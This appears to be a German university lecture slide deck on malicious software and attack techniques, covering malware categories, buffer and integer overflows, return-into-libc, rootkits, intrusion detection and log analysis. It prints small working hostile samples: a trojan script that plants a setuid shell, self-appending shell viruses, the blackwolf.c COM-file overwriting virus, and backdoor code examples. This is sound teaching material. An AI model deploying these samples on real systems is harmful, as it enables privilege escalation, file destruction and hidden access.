Vorlesung Informationssicherheit

Größe: px
Ab Seite anzeigen:

Download "Vorlesung Informationssicherheit"

Transkript

1 1 / 84 Vorlesung Informationssicherheit Thema 5: Bösartige Software Robert Baumgartl 24. Juni 2015

2 Überblick Bösartige Software Wirtsprogramm nötig unabhängig Hintertüren Logische Bomben Viren Würmer Trojanische Pferde verbreiten sich selbständig Abbildung: Mögliche Kategorisierung bösartiger Software lokale vs. entfernte Angriffe on-line- vs. off-line-angriffe 2 / 84

3 3 / 84 Logische Bomben Idee: Implantierung bösartigen Codes in Applikationen (oder in das BS), Aktivierung des Codes, sobald eine bestimmte Aktivierungsbedingung erfüllt Aktivierungsbedingung Eintritt eines Datums (logische) Zeitbombe (Kalender von Aktivierungsdaten: meist simples Löschen von Daten häufig eingesetzt, um Rache für Entlassung o. ä. zu üben

4 Ausschnitt aus dem McAfee-Aktivierungskalender 4 / Mai W97M/Alamat, W97M/Yous, WM/Alliance.A, WM/Envader.A (Intended), WM/Eraser.A:Tw, VBS/Aqui 13. Mai VBS/Aqui, VBS/Zync, WM/Eraser.A:Tw, VBS/Alphae, WM/Envader.A (Intended), Twno.A, WM/BOOM.A;B, WM/BADBOY.A;B;C, WM/FRIDAY.D, WM/FRIDAY.A, WM/Goldsecret.B:Int,WM/CVCK1.B;E, W97M/Rapmak.a, W97M/Yous, W97M/Alamat, WM/SHOWOFF.G, W97M/BackHand.A, W97M/Idea.A, W97M/Digma 14. Mai X97M/Jal.a, W97M/Este, W97M/Alamat, W32/SoftSix.worm, W97M/Yous, WM/PHARDERA.C ;D (INTENDED), W97M/Class.B, W97M/Class.D, W97M/Ekiam, WM/Eraser.A:Tw, VBS/Aqui 15. Mai...

5 Logische Bomben Beispiel: Donald Gene Burleson, Programmierer für Versicherung USPA & IRA, Ft. Worth, TX entlassen am (Grund: persönliche Schwierigkeiten) am um 3 Uhr werden Datensätze aus der Datenbank des Unternehmens gelöscht Code wurde bei Restaurierung der gelöschten Datensätze gefunden Vor Gericht: Benson, who spent four days testifying about how he uncovered the scheme, said the destructive programs were created Sept. 2 and Sept. 3, 1985, on Burleson s computer terminal by someone using Burleson s computer password. (http://catless.ncl.ac.uk/risks/7.56.html) 5 / 84

6 6 / 84 Hintertüren (Back Doors) Idee: Einbau (nichtdokumentierter) Schnittstellen in Software zwecks späteren (unautorisierten) Zugriffes auf das System. Mißbrauch von geheimen Debugging-Schnittstellen schwierig von BS-Seite aus zu erkennen häufiges Relikt aus der Produktentwicklung Behörden sind häufig der Meinung, ein Anrecht auf Hintertüren zu haben Gegenmaßnahme: Code Reviews, Open Source symmetrische vs. asymmetrische Hintertüren viele Würmer installieren Back Doors Klassiker: Back Orifice (http://www.cultdeadcow.com/tools/bo.php) feste Master-BIOS-Passworte, z. B. lkwpeter bei Award BIOS

7 Beispiel einer Hintertür 7 / 84 Beispiel: Login-Code mit Hintertür (Tanenbaum: Modern Operating Systems, 2001, S. 610) while (TRUE) { printf("login: "); get_string(name); disable_echoing(); printf("password: "); get_string(password); enable_echoing(); v = check_validity(name, password); if (v strcmp(name, "zzzzz") == 0) break; } execute_shell(name);

8 Beispiel 2 (Backdoor im Linux-Kern; nice try) 8 / 84 From: Larry McVoy [ blocked] Subject: Re: BK2CVS problem Date: Wed, 5 Nov :23: On Wed, Nov 05, 2003 at 12:58:13PM -0800, Matthew Dharm wrote: > Out of curiosity, what were the changed lines? --- GOOD :46: BAD :46: , ,8 schedule(); goto repeat; } + if ((options == ( WCLONE WALL)) && (current->uid = 0)) + retval = -EINVAL; retval = -ECHILD; end_wait4: current->state = TASK_RUNNING; --- Larry McVoy lm at bitmover.com

9 9 / 84 Beispiel 2 (Backdoor im Linux-Kern; nice try) jemand modifizierte die Kernelquellen (unautorisiert) fraglicher Code gehört zu sys_wait4(), d. h. dem Systemruf wait4() verkleideter Code ; (current->uid = 0) sieht so ähnlich aus wie (current->uid == 0) wenn jemand wait4() aufruft und die Optionen WCLONE und WALL sind gesetzt, so erhält der Rufende root-rechte Code wurde beim Review entdeckt ( It s not a big deal, we catch stuff like this, but it s annoying to the CVS users. )

10 10 / 84 Backdoors Weitere Beispiele Das FBI hat (wahrscheinlich) Vertragspartner gebeten, den IPsec-Stack von OpenBSD mit Backdoors auszustatten ( ) &w=2 Die Konfiguration einiger Router der Firma D-Link kann mittels eines Browsers modifiziert werden, wenn der User-Agent-String die Zeichenkette mlset_roodkcableoj28840ybtide enthält ( ). reverse-engineering-a-d-link-backdoor/

11 11 / 84 Trojanische Pferde ( Trojaner ) Idee: dem Nutzer ein Programm unterschieben, welches bei Aktivierung unerlaubte Aktionen ausführt anstelle eines Eindringlings führt ein autorisierter Nutzer Schadcode aus Beispiel: gefälschter Login-Bildschirm Klassiker: Compiler, der unbemerkt bösartigen Code in übersetzte Programme einbaut (Ken Thompson: Reflections on Trusting Trust, CACM 4(27), S. 761ff.) vgl. " Bundestrojaner"

12 12 / 84 Beispiel eines simplen UNIX-Trojaners (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen

13 13 / 84 Beispiel eines simplen UNIX-Trojaners (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen

14 14 / 84 Beispiel eines simplen UNIX-Trojaners (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen

15 15 / 84 Beispiel eines simplen UNIX-Trojaners (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen

16 16 / 84 Beispiel eines simplen UNIX-Trojaners (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen

17 17 / 84 (Computer)-Viren A virus is a program that is able to infect other programs by modifying them to include a possibly evolved copy of itself. (Fred Cohen) Definition A virus is a program that reproduces its own code by attaching itself to other executable files in such a way that the virus code is executed when the infected executable file is executed. Anmerkungen: Implementationssprache irrelevant keine Schadroutine nötig Wurm ist ggf. auch ein Virus Beispiele: Bootsektor-V., Makro-V., polymorphe V.

18 18 / 84 Beispiel für viralen (virulenten?) Code for i in *.sh; do if test "./$i"!= "$0"; then tail -n 5 $0 cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-)

19 19 / 84 Beispiel für viralen (virulenten?) Code for i in *.sh; do if test "./$i"!= "$0"; then tail -n 5 $0 cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-)

20 20 / 84 Beispiel für viralen (virulenten?) Code for i in *.sh; do if test "./$i"!= "$0"; then tail -n 5 $0 cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-)

21 21 / 84 Beispiel für viralen (virulenten?) Code for i in *.sh; do if test "./$i"!= "$0"; then tail -n 5 $0 cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-)

22 22 / 84 Beispiel für viralen (virulenten?) Code for i in *.sh; do if test "./$i"!= "$0"; then tail -n 5 $0 cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-)

23 Ein (etwas) besserer Virus 23 / 84 for i in *.sh; do if test "./$i"!= "$0"; then HOST=$(echo -n $(tail -10 $i)) VIR=$(echo -n $(tail -10 $0)) if [ "$HOST"!= "$VIR" ] then tail -n 10 $0 cat >> $i; fi fi done

24 24 / 84 Bestandteile eines Virus Infektionsmechanismus: Aufsuchen von Zielen, Replikation Routine(n) zum Verbergen: vor dem Nutzer oder Anti-Viren-Software Trigger: Entscheidung, ob bzw. wann Nutzlast aktiviert wird Nutzlast: zufälliger oder beabsichtigter Schaden oder Spaß Beispiel: blackwolf.c (nächste Folie)

25 25 / 84 Simpler Virus in C blackwolf.c, leicht modifiziert # include <stdio. h> # i n c l u d e <dos. h> # i n c l u d e < d i r. h> FILE Virus, Host ; i n t x, y, done ; char b u f f [ ] ; s t r u c t f f b l k f f b l k ; main ( ) { done = f i n d f i r s t ( "*.COM",& f f b l k, 0 ) ; / Find a.com f i l e / while (! done ) { / Loop for a l l COM s in DIR / p r i n t f ( "Infecting %s\n", f f b l k. ff_name ) ; / Inform user / Virus=fopen ( _argv [ 0 ], "rb" ) ; / Open i n f e c t e d f i l e / Host=fopen ( f f b l k. ff_name, "rb+" ) ; / Open new host f i l e / x=9504; / Virus size / while ( x >256) { / OVERWRITE new Host / fread ( buff,256,1, Virus ) ; / i n chunks of / f w r i t e ( buff,256,1, Host ) ; / 256 bytes / x =256; } fread ( buff, x, 1, Virus ) ; / F i n i s h o f f copy / f w r i t e ( buff, x, 1, Host ) ; f c l o s e a l l ( ) ; / Close both f i l e s and / done = f i n d n e x t (& f f b l k ) ; / go f o r another one. / } r e t u r n ( 0 ) ; }

26 26 / 84 Analyse: Blackwolf-Virus in C sucht alle.com-dateien im aktuellen Verzeichnis und infizierte diese (auf einmal) schnelle Infektion überschreibender Virus mäßig destruktiv: Virus-Code überschreibt Anfang der Ziele verbirgt sich nicht keine Nutzlast infiziert bei jeder Aktivierung, Ziele wachsen nicht, da überschreibend

27 Weitere Informationen zu Viren 27 / 84 An Illustrated Guide to the Worst Viruses in Computer History :

28 28 / 84 Würmer An independently replicating and autonomous infection agent, capable of seeking out new host systems and infecting them via the network. (Jose Nazario: Defence and Detection Strategies against Internet Worms, Artech House, 2004) Bekannte Vertreter: W32.Blaster Melissa Mydoom Sasser Conficker

29 Komponenten eines Wurms 29 / Aufklärung neuer Hosts als potentielle Angriffsziele IP-Adreßräume (partiell) durchsuchen lokale Suche in (z. B.) Konfigurationsdateien OS Fingerprinting, um BS-Typ und -Version zu ermitteln 2. Angriffscode Remote Exploit bekannter Schwachstellen Trojanisches Pferd (z.b. Mail mit attached Binary) benötigt für jede anzugreifende Plattform Exploit 3. Kommunikation z. B. mittels ICMP, UDP,..., über verdeckte Kanäle Verbergen beteiligter Prozesse und Sockets mittels Kernelmodul oder durch Störung von Überwachungssoftware

30 Komponenten eines Wurms 30 / Kommandoschnittstelle interaktiv oder indirekt (script-gesteuert) typische Kommandos: Up-/Download von Dateien, Flut-Ping, Generierung von HTTP-Requests, Verwaltung der erfolgreich angegriffenen Hosts verteilte oder zentralisierte Datenbank Liste aller befallenen Rechner in privatem IRC-Channel

31 Weitere Begriffe 31 / 84 Ransomware (kryptografisch sichere) Verschlüsselung des Massenspeichers Entschlüsselung nur nach Zahlung eines Lösegelds z. B. CryptoLocker (nutzt 2048-Bit-RSA-Schlüssel, forderte 400$) Rootkit Software, die zur Verschleierung der Kompromittierung eines Rechners dient Spyware Keylogger Hoax (z. B. Good-Times- Virus, Bonsai Kitten)

32 Hoax: Bonsai Kitten 32 / 84

33 Rootkits 33 / 84 Def. Ein Rootkit ist ein (üblicherweise unerwünschtes) Programm, das sich nach Installation vor dem Nutzer verbirgt. Merkmale: Installation typischerweise nach erfolgreichem Einbruch, um Einbruchszweck abzusichern, z. B.: dauerhafte Unterwanderung des Systems Diebstahl von Passwortdaten per Keylogger oder Sniffer verschafft sich keine root-privilegien, sondern benötigt diese bei Installation Eintrittsvektoren: versehentliches Ausführen physischer Zugriff des Angreifers auf System Einbruch via Netzwerk

34 34 / 84 Rootkits dateibasierte vs. kernelbasierte Rootkits 1. dateibasierte Rootkits tauschen Werkzeuge aus, die zur Detektion des Rootkits genutzt werde könnten (ssh, ps, ls, netstat) Unterart: Library Rootkits: tauschen die entsprechenden Systembibliotheken aus laufen im User Mode 2. kernelbasierte Rootkits modifizieren (Überraschung!) den Kernel z. B. über Modulmechanismus oder Speicherabbild (/dev/kmem) äußerst schwierig zu detektieren

35 35 / 84 Rootkits Gegenmaßnahmen 1. Unrechtmäßigen root-zugriff verhindern 2. Unrechtmäßigen root-zugriff verhindern (again!) 3. Deaktivierung des Modulmechanismus ( alle Treiber statisch in den Kernel kompilieren) 4. Vergleich nach außen geöffnete Ports (netstat) mit externem Portscan (nmap) Achtung, Hackertool! 5. Suche nach charakteristischen Zeichenketten im Hauptspeicher (Werkzeug chkrootkit) 6. Boot von sauberem Datenträger (Live-CD) und Suche nach verdächtigen Dateien

36 Angriffstechniken 36 / 84

37 37 / 84 Buffer Overflow (Sehr einfaches) verwundbares Programm # include <stdio. h> i n t main ( i n t argc, char argv [ ] ) { char buffer [ ] ; i f ( argc > 1) { s t r c p y ( b u f f e r, argv [ 1 ] ) ; } r e t u r n 0; }

38 38 / 84 Buffer Overflow Prinzip bestimmte Funktionen der C-Bibliothek führen keine Längenprüfung ihrer Argumente aus (Klassiker: strcpy()) Idee: lokale Variablen (über deren Länge hinaus) mit einer solchen Funktion überfluten (Stack Overflow) Überschreiben der Rückkehradresse auf dem Stack mit Adresse einer Schadroutine bei Verlassen der aktuellen Funktion Sprung zur Schadroutine Ursache: mögliches Verlassen von Feldgrenzen in C, ungeprüfte Länge der Argumente von Bibliotheksfunktionen wie strcpy() oder gets(), gezielte Manipulation von Zeigervariablen

39 39 / 84 Stack Overflow Ausschnitt des Stacks hohe Adressen niedrige Adressen Funktionsparameter <Ret> SFP lokale Variablen Puffer

40 40 / 84 Stack Overflow Ausschnitt des Stacks hohe Adressen niedrige Adressen Funktionsparameter <Ret> SFP lokale Variablen Puffer

41 41 / 84 Stack Overflow Ausschnitt des Stacks hohe Adressen niedrige Adressen Funktionsparameter <Ret> SFP lokale Variablen Puffer

42 42 / 84 Stack Overflow Ausschnitt des Stacks hohe Adressen niedrige Adressen Funktionsparameter <Ret> SFP lokale Variablen Puffer

43 43 / 84 Stack Overflow Ausschnitt des Stacks hohe Adressen niedrige Adressen Funktionsparameter <Ret> SFP lokale Variablen Puffer

44 44 / 84 Buffer Overflow Einfache Gegenmaßnahmen Verzicht auf unsichere Funktionen, u.a. strcpy(), strcat(), sprintf(), vsprintf(), gets() bzw. Nutzung der Pendants mit Bereichsprüfung, aber: Semantik nicht übereinstimmend (z. B. nullterminiert strncpy() das Ziel nicht bei maximal langem String) Geschwindigkeitsnachteile Legacy Code?

45 45 / 84 Buffer Overflow Stackguard Idee: Schutz d. Rücksprungadresse durch zusätzliches Canary Word. Canary Word wird im Funktionsprolog angelegt Overflow überschreibt Canary beim Rücksprung aus Funktion wird Canary auf Integrität getestet Abbruch, wenn falscher Wert hohe Adressen niedrige Adressen Funktionsparameter <Ret> Canary SFP lokale Variablen Puffer

46 46 / 84 Buffer Overflow Wahl des Canary Word Terminator Canary Werte nutzen, die typische Zeichenkettenfunktionen terminieren Wert Symbol Semantik 0x00 - stoppt strcpy() 0x0a LF stoppt gets() 0x0d CR -1 EOF stoppt gets() Tabelle: Terminator Canary optimal ist z. B. 0x000d0aff Random Canary erst zum Programmstart generiert; Angreifer kann darauf nicht mehr reagieren (Angreifer läuft parallel zum angegriffenen Programm)

47 47 / 84 Stackguard Grenzen des Konzepts moderate Leistungseinbuße Lokale Variablen und Saved Frame Pointer nicht geschützt Canary Word u. U. durch Angreifer restaurierbar, wenn statisch vgl. Bulba, Kil3r : Bypassing Stackguard and Stackshield, Phrack, vol. 10, no. 56, 2000

48 48 / 84 StackShield Idee: 1. Rücksprungadresse im Prolog in eine extra Tabelle kopieren 2. im Epilog Kopie der Rücksprungadresse wieder an entsprechende Position im Stack schreiben 3. keine Prüfung auf Identität

49 49 / 84 Ausführungsverbot beschreibbarer Seiten (W X ) Einfachster Fall: Architektur unterstützt Execute-Recht im Seitentabelleneintrag (Beispiele: Sparc, PPC, IA64) Problem: IA32 tut dies nicht. Lösung 1: NX ( No-Execute ) aka Enhanced Virus Protection erfordert Physical/Page Address Extension (PAE) existiert eigentlich ab Pentium Pro NX jedoch erst ab Prescott-Kern (Intel), AMD64 Seitentabelleneintrag 64 Bit (anstatt 32) Seiten, Seitentabellen und Seitentabellenverzeichnis 4 KiB nur noch 1/4 der Einträge drittes Hierarchielevel (vgl. folgende Grafik) gegenwärtig: 36-Bit-Adressen (maximal: 52 Bit) Bit 63 ist das (No)-Execute-Bit

50 Adressumsetzung bei PAE 50 / PTR Dir Table Offset lineare Adresse CR3 PageDirPt1 PageDirPt2 PageDirPt3 PageDirPt4 Page Directory Pointer Table PD Eintrag PTE gewähltes Byte gewählte Seite Page Directory 512 Einträge NX Bit (63) Page Tables 512 Einträge physischer Adreßraum

51 Ausführungsverbot beschreibbarer Seiten (W X ) II 51 / 84 Lösung 2: Emulation in Software alle PTEs der zu schützenden Bereiche (Stack, Heap, Daten) haben initial Supervisor-Bit gesetzt Pagefault bei Zugriff Handler: bei Instruction Fetch Abbruch der Task, Logging des Angriffs bei Datenzugriff: Rücksetzen des SV-Bits, Zugriff ausführen (Überführung der Übersetzung in Data-TLB), Setzen des SV-Bits weitere Datenzugriffe durch DTLB gecacht nur möglich, wenn getrennte Daten- und Code-TLBs

52 52 / 84 Ausführungsverbot beschreibbarer Seiten Einbau in Betriebssysteme: Linux ab Windows XP ab SP2; kein Backport nach Windows 2000 PaX-System, vgl.

53 Address Space Layout Randomization (ASLR) 53 / 84 Beobachtung: Distanz zwischen Top-of-Stack (TOS) und anzugreifender Rücksprungadresse ist konstant, wird offline (werkzeuggestützt) erraten und in Exploit eingebaut. Idee: Anfangsadressen von Stack, Heap und Code werden zufällig zur Ladezeit generiert. Problem: eingeblendete shared Libraries müssen auch zufällig verteilt werden $ cat /proc/self/maps grep libc erschwert auch Return-into-libc-Exploits

54 54 / 84 Return-into-Libc Manipulation einer Rückkehradresse auf dem Stack mittels Buffer Overflow jedoch ( Rück -)Sprung in eine Shared Library (libc) anstatt zu eigenem Shellcode (Abb. nächste Folie) Beispiel: system("/bin/sh"); (führt /bin/sh -c /bin/sh aus) wenn angegriffenes Programm setuid root ist, wird damit eine root-shell geöffnet macht nichtausführbaren Stack wirkungslos

55 Stacklayout bei Return-into-Libc 55 / 84 originaler Stack: Argumente der (angegriffenen) Funktion Low lokale Variablen sfp RET arg0 arg1 arg2 High manipulierter Stack: Rückkehradresse aus libc Ruf Argument 0 des libc Rufes Überflutung sfp Adr in libc dummy arg0 system() {... } "/bin/sh" Code in der libc

56 56 / 84 Anmerkungen dummy-feld ist Rückkehradresse, die angesprungen wird, wenn system() verlassen wird irrelevant, wenn interaktive Shell gestartet wurde, da diese nicht zurückkehrt

57 Bestimmung der Einsprungadresse (statisch) 57 / 84 cat dummy.c int main() { system(); } gcc -o dummy dummy.c gdb -q dummy Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1". (gdb) break main Breakpoint 1 at 0x (gdb) run Starting program: /home/local/robge/src/cracking/dummy Breakpoint 1, 0x in main () (gdb) print system $1 = {<text variable, no debug info>} 0xb7ed8990 <system> Gegenmittel: Address Space Layout Randomization, Parameterübergabe in Registern (ELF64-SystemV ABI bei x86-64)

58 58 / 84 Dynamische Ermittlung der Einsprungadresse Idee: Sohn erzeugen, der kontinuierlich system("") aufruft Instruction Pointer springt zwischen main() und system() (libc-funktion) mittels ptrace() kann die genaue Adresse von system() bestimmt werden... Code ansehen...

59 Verkettung zweier libc-rufe 59 / 84 originaler Stack: Argumente der (angegriffenen) Funktion Low lokale Variablen sfp RET arg0 arg1 arg2 High manipulierter Stack: "dummy" Überflutung sfp Adr1 in libc Adr2 in libc arg0 für setuid arg0 für system setuid() {... } system() {... } "/bin/sh" =0x o.ä.

60 60 / 84 Verkettung zweier libc-rufe Reihenfolge setuid() system() setuid(0) leider unmöglich, da Pufferüberlauf damit vorzeitig abbrechen würde nur möglich, wenn erster libc-aufruf genau ein Argument übernimmt (dummy-lücke) weitere Rufe nicht möglich

61 61 / 84 Return-into-Libc-Angriff Weitere Techniken mehr als 2 libc-aufrufe mit beliebig vielen Argumenten (!!) Frame Pointer Lifting Frame Faking Nullbytes im angegriffenen Puffer ebenfalls möglich Literatur: Nergal : The advanced return-into-lib(c) exploits: PaX case study. Phrack #58, 2001

62 62 / 84 Heap-Overflow Idee: Manipulation von auf dem Heap angelegten Variablen durch das Überfluten eines unmittelbar davor gelegenen Puffers keine Rückkehradresse implizite Manipulation des Programmflusses unmöglich Reihenfolge der Adressen abhängig von Allokationsreihenfolge Exploit weniger regulär (abhängig vom Typ der manipulierten Information)

63 63 / 84 Integer-Overflow Literatur: blexim : Basic Integer Overflows, Phrack #60, 2002 Idee: Überlauf des Zahlenbereichs von Integervariablen führt zu negativen Zahlen, die in Vergleichsoperationen und als Funktionsargumente unterschiedlich interpretiert werden. kein Schadcode ausführbar Ziel: DoS

64 64 / 84 Integer-Overflow Beispiel int copybuffer (char *buffer, int len) { char mybuffer[800]; if (len > sizeof(mybuffer)) { return -1; } return memcpy(mybuffer, buffer, len); } Analyse: Typisches Beispiel eines Vorzeichen-Bugs memcpy erwartet unsigned int als 3. Parameter negatives len durch Test nicht erkannt wird als (sehr große) Längenangabe interpretiert Überlauf von mybuffer

65 65 / 84 Intrusion und Intrusion Detection Def. Intrusion Any intenional event where an intruder gains access that compromises the confidentiality, integrity, and availability of computers, networks or the data residing on them. (CERT-CC, 2002) Detektionsprinzipien: signatur-basiert vergleicht beobachtete Sequenzen von Ereignissen im System mit für Einbrüche charakteristischen Ereignissequenzen (Bsp.: hohe Anzahl fehlgeschlagener Anmeldeversuche von ein- und derselben IP-Adresse) schwach gegen neue, unbekannte Techniken anomalie-basiert nutzt Statistiken relevanter Systemparameter, um Ereignisse im System zu klassifizieren

66 66 / 84 Intrusion Detection Systems (IDS) = Software zur automatischen Erkennung von Einbrüchen 3 Typen: hostbasiert - überwacht genau einen Rechner (wertet Log-Dateien aus) netzbasiert - überwacht den Datenverkehr auf einem Netzsegment hybrid - kombinieren beide Techniken Mustererkennung über in Datenbank gespeicherte Signaturen, die verschiedene Angriffsmuster charakterisieren. Beispiele: snort samhain (http://www.la-samhna.de/samhain/ ) Tripwire

67 67 / 84 Systemimmanente Probleme insbesondere bei anomalie-basierten Systemen relativ hohe Fehlerrate (false positives) Gerichtsverwertbarkeit der generierten Daten fragwürdig IDS verhindern Einbrüche, Diebstähle, Sabotage diese können daher nicht gerichtlich verfolgt werden können zwar zur Erkennung von Einbrüchen, aber kaum als deren Beweis vor Gericht genutzt werden

68 Beispiel Logfileauswertung 68 / 84 idir:# zgrep Invalid /var/log/auth.log.1.gz Jan 4 09:04:37 localhost sshd[6750]: Invalid user admin from Jan 4 14:12:52 localhost sshd[5458]: Invalid user staff from Jan 5 19:15:45 localhost sshd[5033]: Invalid user staff from Jan 5 21:22:43 localhost sshd[5052]: Invalid user rfmngr from Jan 5 21:22:47 localhost sshd[5054]: Invalid user sales from Jan 5 21:22:50 localhost sshd[5056]: Invalid user recruit from Jan 5 21:22:53 localhost sshd[5058]: Invalid user alias from Jan 5 21:22:56 localhost sshd[5060]: Invalid user office from Jan 5 21:22:59 localhost sshd[5062]: Invalid user samba from Jan 5 21:23:02 localhost sshd[5064]: Invalid user tomcat from Jan 5 21:23:05 localhost sshd[5066]: Invalid user webadmin from Jan 5 21:23:08 localhost sshd[5068]: Invalid user spam from Jan 5 21:23:11 localhost sshd[5070]: Invalid user virus from Jan 5 21:23:14 localhost sshd[5072]: Invalid user cyrus from Jan 5 21:23:17 localhost sshd[5074]: Invalid user oracle from Jan 5 21:23:20 localhost sshd[5076]: Invalid user michael from Jan 5 21:23:23 localhost sshd[5078]: Invalid user ftp from Jan 5 21:23:27 localhost sshd[5080]: Invalid user test from Jan 5 21:23:29 localhost sshd[5082]: Invalid user webmaster from Jan 5 21:23:36 localhost sshd[5084]: Invalid user postmaster from Jan 5 21:23:39 localhost sshd[5086]: Invalid user postfix from Jan 5 21:23:41 localhost sshd[5088]: Invalid user postgres from

69 69 / 84 Etwas systematischer... Logfiles (Protokolldateien) sind Datensätze, die durch das System (z. B. syslogd) geschrieben werden enthalten stets Zeitstempel ( Uhr stellen!) liegen gewöhnlich in /var/log/ rotieren sind meist gewöhnliche Textdateien sind akribisch bei einer forensischen Analyse auszuwerten werden von Eindringlingen daher bevorzugt manipuliert

70 70 / 84 Was wird von Linux geloggt? Authentifizierungsvorgänge (sudo, ssh,... ): /var/log/auth.log Ereignisse, die den Kern i. e. S. betreffen: /var/log/kern.log detaillierte Systemoperationen im Syslog: /var/log/syslog Ereignisse rund um Daemons: /var/log/daemon.log Ereignisse des XWindows-Systems /var/log/xorg.0.log (informatorische) Nachrichten /var/log/messages /var/log/debug applikationsspezifische Logs: mail, dpkg, cups, apache2, samba

71 Loginvorgänge 71 / 84 /var/log/wtmp /var/run/utmp /var/log/lastlog Binärdateien utmp: wer ist momentan eingeloggt? wtmp zeichnet alle An- und Abmeldungen im System auf. lastlog enthält Zeitstempel der letzen Logins aller Nutzer w und who nutzen z. B. utmp: $ strace who 2>&1 grep utmp access("/var/run/utmpx", F_OK) = -1 ENOENT (No such file or directory) open("/var/run/utmp", O_RDWR) = -1 EACCES (Permission denied) open("/var/run/utmp", O_RDONLY) = 3

72 72 / 84 Die Shell loggt ebenfalls.bash_history zeichnet alle Kommandos des Nutzers auf chattr +au /home/user/.bash_history durch root verhindert das Löschen

73 73 / 84 Logfile-Cleaner Achtung! Hackerwerkzeug! ( 202c StGB droht) Beispiel: z2.c entfernt alle Einträge des Nutzers aus utmp, wtmp, lastlog weitere Literatur : üblicherweise wird nicht sicher gelöscht

74 Beispiel Anwendung z2 und Detektierung 74 / 84 hadrian:#./z2 robge Zap2! hadrian:# lastlog grep robge robge **Noch nie angemeldet** hadrian:# chkrootkit ROOTDIR is / Checking amd... not found Checking basename... not infected Checking biff... not found Checking chfn... not infected Checking chsh... not infected Checking cron... not infected Checking crontab... not infected Checking date... not infected... Checking w not infected Checking wted... 1 deletion(s) between Sat Jan 26 09:52: and Sun Jan 27 16:48: Checking scalper... not infected Checking slapper... not infected Checking z2... user robge deleted or never logged from lastlog!

75 75 / 84 Zentrale Logging-Instanz Idee: relevante Logfiles an eine zentrale Instanz sicher übertragen, dort auswerten und sichern RFC 3195 ( Reliable Delivery for Syslog ) einfachste Lösung: per cron und scp alle Logs auf Log-Rechner übertragen Problem: Zeitverzögerung erschwert Einbruchserkennung syslog-ng Central Loghost Mini-HOWTO (http://www.campin.net/newlogcheck.html)

76 Noch einige wichtige Werkzeuge zum Schluss / 84

77 77 / 84 Nmap Portscanner für Windows und Linux versucht, sequentiell zu allen well-known TCP-Ports des Zielrechners Verbindung mittels connect() herzustellen ( Liste offener Ports) auch ephemeral und UDP-Ports prüfbar Achtung! Hackerwerkzeug! ( 202c StGB droht) nur mit eigenen Rechnern spielen. kann ggf. das Betriebssystem des Zieles erraten

78 Einsatzbeispiel Nmap 78 / 84 hadrian:/home/local/robge/outgoing# nmap -O Starting Nmap 4.11 ( ) at :53 CET Interesting ports on fritz.box ( ): Not shown: 1679 closed ports PORT STATE SERVICE 80/tcp open http MAC Address: 00:15:0C:FC:58:69 (AVM GmbH) Device type: general purpose Running: Linux 2.4.X 2.5.X OS details: Linux Uptime days (since Thu Dec 20 11:10: ) Nmap finished: 1 IP address (1 host up) scanned in seconds

79 79 / 84 Nessus Achtung! Hackerwerkzeug! ( 202c StGB droht) sog. Vulnerability Scanner für UNIX ermittelt potentielle Schwachstellen eines Zielsystems früher GPL, ab Version 3 closed source (?) Testprogramme für einzelne Schwachstellen werden als Plug-ins zur Verfügung gestellt Beschreibung einer Sicherheitslücke mittels Nessus Attack Scripting Language (NASL) 2 Plug-In-Feeds: direkt ($1200 pro Jahr und Scanner), delayed (7 Tage; frei) Trennung in Daemon und Client

80 Screenshot eines typischen Reports 80 / 84

81 81 / 84 Wireshark Achtung! Hackerwerkzeug! ( 202c StGB droht) Sniffer und Analyzer

82 Screenshot eines typischen Dumps 82 / 84

83 Was haben wir gelernt? 83 / 84 Kategorien bösartiger Software Logische Bomben Hintertüren Trojaner Viren Würmer Angriffstechniken Buffer Overflow und Gegenmaßnahmen: Stackguard, Stackshield, W X, ASLR Return-into-Libc-Exploit Heap- und Integer-Overflow Logging einige Hackerwerkzeuge

Vorlesung Betriebssysteme II

Vorlesung Betriebssysteme II 1 / 109 Vorlesung Betriebssysteme II Thema 7: Betriebssysteme-Sicherheit Robert Baumgartl 18. Mai 2015 Überblick 2 / 109 Grundbegriffe Bösartige Software Authentifizierungsmechanismen Angriffstechniken:

Mehr

MALWARE AM BEISPIEL VON STUXNET

